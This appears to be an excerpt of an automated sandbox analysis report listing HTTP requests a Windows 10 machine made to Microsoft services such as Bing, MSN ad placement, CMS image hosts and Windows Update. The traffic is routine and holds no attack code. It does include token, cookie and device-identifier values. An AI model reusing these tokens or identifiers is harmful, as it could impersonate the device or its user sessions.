Source: global traffic	HTTP traffic detected: GET /client/config?cc=US&setlang=en-US HTTP/1.1X-Search-CortanaAvailableCapabilities: CortanaExperience,SpeechLanguageX-Search-SafeSearch: ModerateAccept-Encoding: gzip, deflateX-Device-MachineId: {A2AB526A-D38D-4FC9-8BA0-E34B8D6354E8}X-UserAgeClass: UnknownX-BM-Market: USX-BM-DateFormat: M/d/yyyyX-CortanaAccessAboveLock: falseX-Device-OSSKU: 48X-BM-DTZ: -420X-BM-FirstEnabledTime: 132061295966656129X-DeviceID: 0100748C09004E33X-Search-TimeZone: Bias=480; DaylightBias=-60; TimeZoneKeyName=Pacific Standard TimeX-BM-Theme: 000000;0078d7X-Search-RPSToken: t%3DEwDYAkR8BAAUcvamItSE/vUHpyZRp3BeyOJPQDsAAdHhx8iymSSnJAmh1tgDZKr77ot8B6QUi2shZW2dULbezpqgg0iqJ37LfBvqqt9zP6Ig8x7uKUJaed8rlY%2B/2EytlnPHV0q4i%2BiEAw%2BWfcd9bEBF30hxUf6ZitlZ1g1Ut0HtdRoh1ygr7L1TQxXd0UyW/marh2wdDtlQrfNW4bcp6IvX089fERmyWwzBPModtVT251rVNwa6kKasVyy/%2BEi0OU1v98QUKAuM4aKCOzTWw%2BtmELqA3bhLB2m9xsH%2BOVfDNm%2BbaKt4sDB9RoFY7EYVPG4k/c761m%2BRLxkRa/Ir/QrkUODSY/KIghkYO96sQAQdUmLDBgZ61OXTT644iE4DZgAACCZ24AeDlJNVqAFvHXfjbkIAfwcuEyH6av35yBTV4VojYUIApTKmJ2S%2BtkxqAh9rUOw2HxPMfan0bmxSuqaB2w2uTINu9uWFLbqBmqqLhQGRhQzURQPZhTm6UaP/OVev4TiBVL50icRRGNt0giUIXtqvZ4TNyL1LVvdk8KXNg7t/YDUh5pK5rOUWzdgA8bvgC%2BAJqJ1Wbdlbv/KcooFoa3rs5Q%2BdHw4/dlSnFnBy2225zapf9rf7oU/GrCHqIl5Ju5FL16X1O8FGOf89NNfrrbfkr%2BC/TrBNGg1aAtMm%2BxZ82RbtJt%2BBLOqEV9hB%2B0ois3q0/rerlznNAYv9DJRDIbCAhmISyNbCR6HYhH5eHIQdlmUugwtmKNAJXjGbnc6UJ7iVabuWqAqBDhlhgHjo7tUplfqJZOQ/haBui6F/0H0iea1QdLjnshiOkaBQVhgwGwj/Jb9W5fX6wzDHFxyQv%2BJwdrCs7Tlz%2BBwQKMxaPo5qSvk1K%2BqAHcGb2%2BNomWDOcIyirH6tSTzUuTJ/nfrUEzRKTu4fZqxcnN/fHKQHNx%2BrADAm4YPBCvMXZcXJEYreR6nu1wE%3D%26p%3DX-Agent-DeviceId: 0100748C09004E33X-BM-CBT: 1654707220User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.10.7.17134; 10.0.0.0.17134.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134X-Device-isOptin: trueAccept-language: en-US, enX-Device-Touch: falseX-Device-ClientSession: AAA05D4B02704ADDB5E6E481F7AFC561X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIX-BM-ClientFeatures: pbitcpdisabled,AmbientWidescreen,rs1musicprod,CortanaSPAXamlHeaderHost: www.bing.comConnection: Keep-AliveCookie: MUID=1E17B9B70E9B4C6E957D159ED3646FFF
Source: global traffic	HTTP traffic detected: GET /proactive/v2/spark?cc=US&setLang=en-US HTTP/1.1X-Search-CortanaAvailableCapabilities: CortanaExperience,SpeechLanguageX-Search-SafeSearch: ModerateAccept-Encoding: gzip, deflateX-Device-MachineId: {A2AB526A-D38D-4FC9-8BA0-E34B8D6354E8}X-Device-IsBatteryCertified: falseX-UserAgeClass: UnknownX-BM-Market: USX-BM-DateFormat: M/d/yyyyX-CortanaAccessAboveLock: falseX-Device-OSSKU: 48X-Device-IsBatteryEnabled: falseX-Device-NetworkType: ethernetX-BM-DTZ: -420X-BM-FirstEnabledTime: 132061295966656129X-DeviceID: 0100748C09004E33X-VoiceActivationOn: falseX-Device-AudioCapture: Microphone (High Definition Audio Device)X-Search-TimeZone: Bias=480; DaylightBias=-60; TimeZoneKeyName=Pacific Standard TimeX-BM-Theme: 000000;0078d7X-Search-RPSToken: t%3DEwDYAkR8BAAUcvamItSE/vUHpyZRp3BeyOJPQDsAAdHhx8iymSSnJAmh1tgDZKr77ot8B6QUi2shZW2dULbezpqgg0iqJ37LfBvqqt9zP6Ig8x7uKUJaed8rlY%2B/2EytlnPHV0q4i%2BiEAw%2BWfcd9bEBF30hxUf6ZitlZ1g1Ut0HtdRoh1ygr7L1TQxXd0UyW/marh2wdDtlQrfNW4bcp6IvX089fERmyWwzBPModtVT251rVNwa6kKasVyy/%2BEi0OU1v98QUKAuM4aKCOzTWw%2BtmELqA3bhLB2m9xsH%2BOVfDNm%2BbaKt4sDB9RoFY7EYVPG4k/c761m%2BRLxkRa/Ir/QrkUODSY/KIghkYO96sQAQdUmLDBgZ61OXTT644iE4DZgAACCZ24AeDlJNVqAFvHXfjbkIAfwcuEyH6av35yBTV4VojYUIApTKmJ2S%2BtkxqAh9rUOw2HxPMfan0bmxSuqaB2w2uTINu9uWFLbqBmqqLhQGRhQzURQPZhTm6UaP/OVev4TiBVL50icRRGNt0giUIXtqvZ4TNyL1LVvdk8KXNg7t/YDUh5pK5rOUWzdgA8bvgC%2BAJqJ1Wbdlbv/KcooFoa3rs5Q%2BdHw4/dlSnFnBy2225zapf9rf7oU/GrCHqIl5Ju5FL16X1O8FGOf89NNfrrbfkr%2BC/TrBNGg1aAtMm%2BxZ82RbtJt%2BBLOqEV9hB%2B0ois3q0/rerlznNAYv9DJRDIbCAhmISyNbCR6HYhH5eHIQdlmUugwtmKNAJXjGbnc6UJ7iVabuWqAqBDhlhgHjo7tUplfqJZOQ/haBui6F/0H0iea1QdLjnshiOkaBQVhgwGwj/Jb9W5fX6wzDHFxyQv%2BJwdrCs7Tlz%2BBwQKMxaPo5qSvk1K%2BqAHcGb2%2BNomWDOcIyirH6tSTzUuTJ/nfrUEzRKTu4fZqxcnN/fHKQHNx%2BrADAm4YPBCvMXZcXJEYreR6nu1wE%3D%26p%3DX-Agent-DeviceId: 0100748C09004E33X-BM-CBT: 1654707220User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.10.7.17134; 10.0.0.0.17134.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134X-Device-isOptin: trueAccept-language: en-US, enX-Device-IsEnergyHero: falseX-Device-Touch: falseX-Device-ClientSession: AAA05D4B02704ADDB5E6E481F7AFC561X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIX-BM-ClientFeatures: pbitcpdisabled,AmbientWidescreen,rs1musicprod,CortanaSPAXamlHeaderHost: www.bing.comConnection: Keep-AliveCookie: MUID=1E17B9B70E9B4C6E957D159ED3646FFF
Source: global traffic	HTTP traffic detected: GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=280815&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:472DC600-FEAB-E7F8-720D-1E33F00FD1E7&ctry=US&time=20220608T165516Z&lc=en-US&pl=en-US&idtp=mid&uid=4388269c-b420-4134-ac19-bc7ca8a19ac1&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=fa40a53f8d124310a2829b47a4cb1dc7&ctmode=MultiSession&arch=x64&cdm=1&cdmver=10.0.17134.1&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.17134.1&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=1550855&metered=false&nettype=ethernet&npid=sc-280815&oemName=dvtdma%2C%20Inc.&oemid=dvtdma%2C%20Inc.&ossku=Professional&smBiosDm=dvtdma7%2C1&tl=2&tsu=1550855&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing= HTTP/1.1Accept-Encoding: gzip, deflateX-SDK-CACHE: chs=0&imp=0&chf=0&ds=50583&fs=32319&sc=6X-SDK-HW-TOKEN: t=EwDYAppeBAAUlAKXDAofTQM+n+MaRVFKzH/ehWgAAUq9+Om9gS1B07miEkRESJzn1ngtMHI+BdxLUeOr9a0momEG+B4rv47QolfsiZSx1Hfe3Zhp2N6Z+eOMd4/Fj9SxpRfFmw4LSrPlpauvPPuvCrBb0nHKfVilROYFYXvmf7o9i/8JV8qUfpGmoXhYcKc56hfzx4NCNiUGxFRXGDB44U6T7SXYJU3kyvGcNxIhtkyKvgFJGUNmYbwfpGVUOIWYFkmFSerhJbkZ1Xo5T0A/vFJtsuti05QIVlurnP6LIIoNk0RoxKS4veZqAoA3EVidid5Dyrl9pRk4xxMgZ6APeImK4Boo9XtiPg0lee00YRGTgSOQLFuLeUyktfLMDrEDZgAACNh+50jdA5P2qAEVaZF8xbnr0hH0m49Trgnixhq7kvEDXn3MK+kfUcwRw8wPmEAuwcz7k9DZE9p/w1telgcNOxcLXkavKg/sJiAIssy7ZObZELSNQ22cX3veN8bjkP9vquJm1NX4u4KVmHeqILbFQUtJr//HQsBxHhiSzwF8jDwjb4RYRwcS8IffJ3anGy989Vpj+pRqYlZQ51Gn/nXdQLdTFKe2XyZXD5diVWhisTbuDjhw0xWsO7WgdGKdm67EpV01P9e4BRHJdrQJNPuRaPiWWggTNh/cHfTZ11b7equMY2XZ9HzukWjEyl4y+V2aCFoIsLyM9SKbG+jT5LWexPbvbdHHBk+Vw6udZWyuZtBOZjcvIJty3o3AW9fvRTtJePgYgXIipt6Wiq/BUCbTe0tHrlbb/cXmQfuR7/JwdyeAgBnBB/fr4p1Ywojhw4HDl/Srj7mn378FImb9BvpvmuZTG6mmYfuka7ijQ4SLc+NrZCCz2QtAM4R64uG0NfA4J+O0l2UzuCz/4rnqIwuwl15RmmzzUAfqXhwjth6az81AgKrqw4nmlm7NjvadlV3xUTPU1wE=&p=Cache-Control: no-cacheMS-CV: d9koyF4tKEOykR65.0User-Agent: WindowsShellClient/9.0.40929.0 (Windows)X-SDK-HWF: tch0,m301,m751,mA01,mT01Host: arc.msn.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=338389&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:472DC600-FEAB-E7F8-720D-1E33F00FD1E7&ctry=US&time=20220608T165516Z&lc=en-US&pl=en-US&idtp=mid&uid=4388269c-b420-4134-ac19-bc7ca8a19ac1&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=e1b9273213d540a2944deefca2f77cd3&ctmode=MultiSession&arch=x64&cdm=1&cdmver=10.0.17134.1&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.17134.1&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=1550855&metered=false&nettype=ethernet&npid=sc-338389&oemName=dvtdma%2C%20Inc.&oemid=dvtdma%2C%20Inc.&ossku=Professional&smBiosDm=dvtdma7%2C1&tl=2&tsu=1550855&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing= HTTP/1.1Accept-Encoding: gzip, deflateX-SDK-CACHE: chs=0&imp=0&chf=0&ds=50583&fs=32319&sc=6X-SDK-HW-TOKEN: t=EwDYAppeBAAUlAKXDAofTQM+n+MaRVFKzH/ehWgAAcoT2xWTT8B4K6mtV5tIxGnC02GsRTU5yPFjb99UFYSlBGueIufF+PeDs0KJm0UB16pQqaMLUESx/ANwPw5stibNwfwd9LWR2Q5aFKB9H9Rq8Tbk3/xUUTY2u3zeLajotcveWFy679D3IsrJFTmjG7M/6GaZLgqr6QINPT03fkqsS26Tp07Th+SBiZqmx/MbLhlctmjW3MGi825F8UfJCa3CxpUuWd75pk5HdggWwSBHrxQOv1LVEDUxS/Pai3pm2PaDkYwpfql6nei57WW49GDgqvogInmB3zgYEzdULPmE/a5Rih3n0rjNpEcge+HDy1vOkoA0TC5cKeYNwrDm2BIDZgAACEyz1f8DUxL5qAGoD//34iGMkGey+aS9xEe8eMTTjFWGRY8gbsBwj82QydScUJb2HDyhhjWsP4VqKqUOPW0sncGla0wqHbo64v/Im3siKy1KgLczIhzeRnzt2nbGiY79mMRHXiuCcxEF87VXEmFYhSM3XFqSCwL6DWJot8JBA59TWqAB/6pVOqU41uoSXfNlktNNO0CYJ8WWzLTya+rwDt+v3+1lxrMwMt7SQABErYSrOWFQGCto1ommHx7sk+i+warsWTYG4tWvNTvHUdXwGz7PlCBRtGtgMR48tDzA5QMUK78w3PJanEXTA7fQmFY2NK63UiVzOjnDpsJ1cYy57ekYQVGi+MHr2ZW2PxDRFh3pJiHuJ8MnnpW+ERi9WFYcfAXbgg3xPTx29VBNQXl2aB1OHc1U5LgQE3lVAYAL4vZCQ7Ig1TDQW9K4VYkYWfSKC/emaTIpSh5J2R49hKScsJ7MSsbXHqNnlp2Avfn4r4vif+rsmfjPgcXzPwrJYQXP3BHg9WBAe9Yfqib46FBcghjaZzYIdVOhtPUnjOFuTwl0lj78G6q6KZHNQKGmqX1RhD/l1wE=&p=Cache-Control: no-cacheMS-CV: d9koyF4tKEOykR65.0User-Agent: WindowsShellClient/9.0.40929.0 (Windows)X-SDK-HWF: tch0,m301,m751,mA01,mT01Host: arc.msn.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=338388&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:472DC600-FEAB-E7F8-720D-1E33F00FD1E7&ctry=US&time=20220608T165600Z&lc=en-US&pl=en-US&idtp=mid&uid=4388269c-b420-4134-ac19-bc7ca8a19ac1&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=8269c44c06284e1ca50e8d554a67885c&ctmode=MultiSession&arch=x64&cdm=1&cdmver=10.0.17134.1&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.17134.1&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=1550856&metered=false&nettype=ethernet&npid=sc-338388&oemName=dvtdma%2C%20Inc.&oemid=dvtdma%2C%20Inc.&ossku=Professional&rver=2&smBiosDm=dvtdma7%2C1&tl=2&tsu=1550856&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing= HTTP/1.1Accept-Encoding: gzip, deflateX-SDK-CACHE: chs=0&imp=0&chf=0&ds=50583&fs=32319&sc=6X-SDK-HW-TOKEN: t=EwDYAppeBAAUlAKXDAofTQM+n+MaRVFKzH/ehWgAAcoT2xWTT8B4K6mtV5tIxGnC02GsRTU5yPFjb99UFYSlBGueIufF+PeDs0KJm0UB16pQqaMLUESx/ANwPw5stibNwfwd9LWR2Q5aFKB9H9Rq8Tbk3/xUUTY2u3zeLajotcveWFy679D3IsrJFTmjG7M/6GaZLgqr6QINPT03fkqsS26Tp07Th+SBiZqmx/MbLhlctmjW3MGi825F8UfJCa3CxpUuWd75pk5HdggWwSBHrxQOv1LVEDUxS/Pai3pm2PaDkYwpfql6nei57WW49GDgqvogInmB3zgYEzdULPmE/a5Rih3n0rjNpEcge+HDy1vOkoA0TC5cKeYNwrDm2BIDZgAACEyz1f8DUxL5qAGoD//34iGMkGey+aS9xEe8eMTTjFWGRY8gbsBwj82QydScUJb2HDyhhjWsP4VqKqUOPW0sncGla0wqHbo64v/Im3siKy1KgLczIhzeRnzt2nbGiY79mMRHXiuCcxEF87VXEmFYhSM3XFqSCwL6DWJot8JBA59TWqAB/6pVOqU41uoSXfNlktNNO0CYJ8WWzLTya+rwDt+v3+1lxrMwMt7SQABErYSrOWFQGCto1ommHx7sk+i+warsWTYG4tWvNTvHUdXwGz7PlCBRtGtgMR48tDzA5QMUK78w3PJanEXTA7fQmFY2NK63UiVzOjnDpsJ1cYy57ekYQVGi+MHr2ZW2PxDRFh3pJiHuJ8MnnpW+ERi9WFYcfAXbgg3xPTx29VBNQXl2aB1OHc1U5LgQE3lVAYAL4vZCQ7Ig1TDQW9K4VYkYWfSKC/emaTIpSh5J2R49hKScsJ7MSsbXHqNnlp2Avfn4r4vif+rsmfjPgcXzPwrJYQXP3BHg9WBAe9Yfqib46FBcghjaZzYIdVOhtPUnjOFuTwl0lj78G6q6KZHNQKGmqX1RhD/l1wE=&p=Cache-Control: no-cacheMS-CV: Q9MiT3HKh0i++QB5.0User-Agent: WindowsShellClient/9.0.40929.0 (Windows)X-SDK-HWF: tch0,m301,m751,mA01,mT01Host: arc.msn.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=338387&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:472DC600-FEAB-E7F8-720D-1E33F00FD1E7&ctry=US&time=20220608T165600Z&lc=en-US&pl=en-US&idtp=mid&uid=4388269c-b420-4134-ac19-bc7ca8a19ac1&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=f049df15f3744d47b4f8f36928768356&ctmode=MultiSession&arch=x64&cdm=1&cdmver=10.0.17134.1&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.17134.1&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=1550856&metered=false&nettype=ethernet&npid=sc-338387&oemName=dvtdma%2C%20Inc.&oemid=dvtdma%2C%20Inc.&ossku=Professional&rver=2&sc-mode=0&smBiosDm=dvtdma7%2C1&tl=2&tsu=1550856&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing= HTTP/1.1Accept-Encoding: gzip, deflateX-SDK-CACHE: chs=0&imp=0&chf=0&ds=50583&fs=32319&sc=6X-SDK-HW-TOKEN: t=EwDYAppeBAAUlAKXDAofTQM+n+MaRVFKzH/ehWgAAcoT2xWTT8B4K6mtV5tIxGnC02GsRTU5yPFjb99UFYSlBGueIufF+PeDs0KJm0UB16pQqaMLUESx/ANwPw5stibNwfwd9LWR2Q5aFKB9H9Rq8Tbk3/xUUTY2u3zeLajotcveWFy679D3IsrJFTmjG7M/6GaZLgqr6QINPT03fkqsS26Tp07Th+SBiZqmx/MbLhlctmjW3MGi825F8UfJCa3CxpUuWd75pk5HdggWwSBHrxQOv1LVEDUxS/Pai3pm2PaDkYwpfql6nei57WW49GDgqvogInmB3zgYEzdULPmE/a5Rih3n0rjNpEcge+HDy1vOkoA0TC5cKeYNwrDm2BIDZgAACEyz1f8DUxL5qAGoD//34iGMkGey+aS9xEe8eMTTjFWGRY8gbsBwj82QydScUJb2HDyhhjWsP4VqKqUOPW0sncGla0wqHbo64v/Im3siKy1KgLczIhzeRnzt2nbGiY79mMRHXiuCcxEF87VXEmFYhSM3XFqSCwL6DWJot8JBA59TWqAB/6pVOqU41uoSXfNlktNNO0CYJ8WWzLTya+rwDt+v3+1lxrMwMt7SQABErYSrOWFQGCto1ommHx7sk+i+warsWTYG4tWvNTvHUdXwGz7PlCBRtGtgMR48tDzA5QMUK78w3PJanEXTA7fQmFY2NK63UiVzOjnDpsJ1cYy57ekYQVGi+MHr2ZW2PxDRFh3pJiHuJ8MnnpW+ERi9WFYcfAXbgg3xPTx29VBNQXl2aB1OHc1U5LgQE3lVAYAL4vZCQ7Ig1TDQW9K4VYkYWfSKC/emaTIpSh5J2R49hKScsJ7MSsbXHqNnlp2Avfn4r4vif+rsmfjPgcXzPwrJYQXP3BHg9WBAe9Yfqib46FBcghjaZzYIdVOhtPUnjOFuTwl0lj78G6q6KZHNQKGmqX1RhD/l1wE=&p=Cache-Control: no-cacheMS-CV: Q9MiT3HKh0i++QB5.0User-Agent: WindowsShellClient/9.0.40929.0 (Windows)X-SDK-HWF: tch0,m301,m751,mA01,mT01Host: arc.msn.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cms/api/am/imageFileData/RE4Yv25?ver=483f HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: img-prod-cms-rt-microsoft-com.akamaized.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cms/api/am/imageFileData/RE4YgQP?ver=6c2f HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: img-prod-cms-rt-microsoft-com.akamaized.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cms/api/am/imageFileData/RE4XQVW?ver=0e49 HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: img-prod-cms-rt-microsoft-com.akamaized.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cms/api/am/imageFileData/RWwPhb?ver=1c28 HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: img-prod-cms-rt-microsoft-com.akamaized.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cms/api/am/imageFileData/RE4XTwY?ver=47fc HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: img-prod-cms-rt-microsoft-com.akamaized.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cms/api/am/imageFileData/RWwzJo?ver=ad90 HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: img-prod-cms-rt-microsoft-com.akamaized.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=310091&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:472DC600-FEAB-E7F8-720D-1E33F00FD1E7&ctry=US&time=20220608T165641Z&lc=en-US&pl=en-US&idtp=mid&uid=4388269c-b420-4134-ac19-bc7ca8a19ac1&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=d2f302b8f69144b29a64ae9cbd710c85&ctmode=MultiSession&arch=x64&cdm=1&cdmver=10.0.17134.1&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.17134.1&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=1550856&metered=false&nettype=ethernet&npid=sc-310091&oemName=dvtdma%2C%20Inc.&oemid=dvtdma%2C%20Inc.&ossku=Professional&rver=2&smBiosDm=dvtdma7%2C1&tl=2&tsu=1550856&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing= HTTP/1.1Accept-Encoding: gzip, deflateX-SDK-CACHE: chs=0&imp=0&chf=0&ds=50583&fs=32319&sc=6X-SDK-HW-TOKEN: t=EwDYAppeBAAUlAKXDAofTQM+n+MaRVFKzH/ehWgAAcoT2xWTT8B4K6mtV5tIxGnC02GsRTU5yPFjb99UFYSlBGueIufF+PeDs0KJm0UB16pQqaMLUESx/ANwPw5stibNwfwd9LWR2Q5aFKB9H9Rq8Tbk3/xUUTY2u3zeLajotcveWFy679D3IsrJFTmjG7M/6GaZLgqr6QINPT03fkqsS26Tp07Th+SBiZqmx/MbLhlctmjW3MGi825F8UfJCa3CxpUuWd75pk5HdggWwSBHrxQOv1LVEDUxS/Pai3pm2PaDkYwpfql6nei57WW49GDgqvogInmB3zgYEzdULPmE/a5Rih3n0rjNpEcge+HDy1vOkoA0TC5cKeYNwrDm2BIDZgAACEyz1f8DUxL5qAGoD//34iGMkGey+aS9xEe8eMTTjFWGRY8gbsBwj82QydScUJb2HDyhhjWsP4VqKqUOPW0sncGla0wqHbo64v/Im3siKy1KgLczIhzeRnzt2nbGiY79mMRHXiuCcxEF87VXEmFYhSM3XFqSCwL6DWJot8JBA59TWqAB/6pVOqU41uoSXfNlktNNO0CYJ8WWzLTya+rwDt+v3+1lxrMwMt7SQABErYSrOWFQGCto1ommHx7sk+i+warsWTYG4tWvNTvHUdXwGz7PlCBRtGtgMR48tDzA5QMUK78w3PJanEXTA7fQmFY2NK63UiVzOjnDpsJ1cYy57ekYQVGi+MHr2ZW2PxDRFh3pJiHuJ8MnnpW+ERi9WFYcfAXbgg3xPTx29VBNQXl2aB1OHc1U5LgQE3lVAYAL4vZCQ7Ig1TDQW9K4VYkYWfSKC/emaTIpSh5J2R49hKScsJ7MSsbXHqNnlp2Avfn4r4vif+rsmfjPgcXzPwrJYQXP3BHg9WBAe9Yfqib46FBcghjaZzYIdVOhtPUnjOFuTwl0lj78G6q6KZHNQKGmqX1RhD/l1wE=&p=Cache-Control: no-cacheMS-CV: eCuIOkvo8kiHm8UW.0User-Agent: WindowsShellClient/9.0.40929.0 (Windows)X-SDK-HWF: tch0,m301,m751,mA01,mT01Host: arc.msn.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /v1/a/installComplete?pg=PC000P0FR5.0000000IQ8&unid=&placementType=PostOOBE&app=&pid=425106558&cid=128000000001392729&tid=700342085&reqasid=d0ba81e65d964d98ac625f8466261144&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&auid=&anid=&muid=&persid=&itemId=9WZDNCRFHWD2&skuId=0010&installKind=RedirectTile&ctid=store-curated-postoobe&bSrc=i.t&asid=57d951360cdd4c8fac5a233947b0e595&time=20220608T165607Z HTTP/1.1Accept-Encoding: gzip, deflateUser-Agent: WindowsShellClient/9.0.40929.0 (Windows)Host: ris.api.iris.microsoft.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /v1/a/opportunity?pg=PC000P0FR5.0000000IQ8&unid=&placementType=PostOOBE&app=&pid=425106558&cid=128000000001392729&tid=700342085&reqasid=d0ba81e65d964d98ac625f8466261144&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&auid=&anid=&muid=&persid=&itemId=9NBLGGGZM6WM&skuId=0010&installKind=RedirectTile&ctid=store-curated-postoobe&bSrc=i.t&asid=57d951360cdd4c8fac5a233947b0e595&time=20220608T165608Z HTTP/1.1Accept-Encoding: gzip, deflateUser-Agent: WindowsShellClient/9.0.40929.0 (Windows)Host: ris.api.iris.microsoft.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /v1/a/opportunity?pg=PC000P0FR5.0000000IQ8&unid=&placementType=PostOOBE&app=&pid=425106558&cid=128000000001392729&tid=700342085&reqasid=d0ba81e65d964d98ac625f8466261144&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&auid=&anid=&muid=&persid=&itemId=9WZDNCRFHWD2&skuId=0010&installKind=RedirectTile&ctid=store-curated-postoobe&bSrc=i.t&asid=57d951360cdd4c8fac5a233947b0e595&time=20220608T165609Z HTTP/1.1Accept-Encoding: gzip, deflateUser-Agent: WindowsShellClient/9.0.40929.0 (Windows)Host: ris.api.iris.microsoft.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /SLS/%7B9482F4B4-E343-43B6-B170-9A65BC822C77%7D/x64/10.0.17134.1/0?CH=17&L=en-US&P=&PT=0x30&WUA=10.0.17134.1&MK=V9ZhaY+AExEokuW&MD=nDwd7vN9 HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.81Host: sls.update.microsoft.com
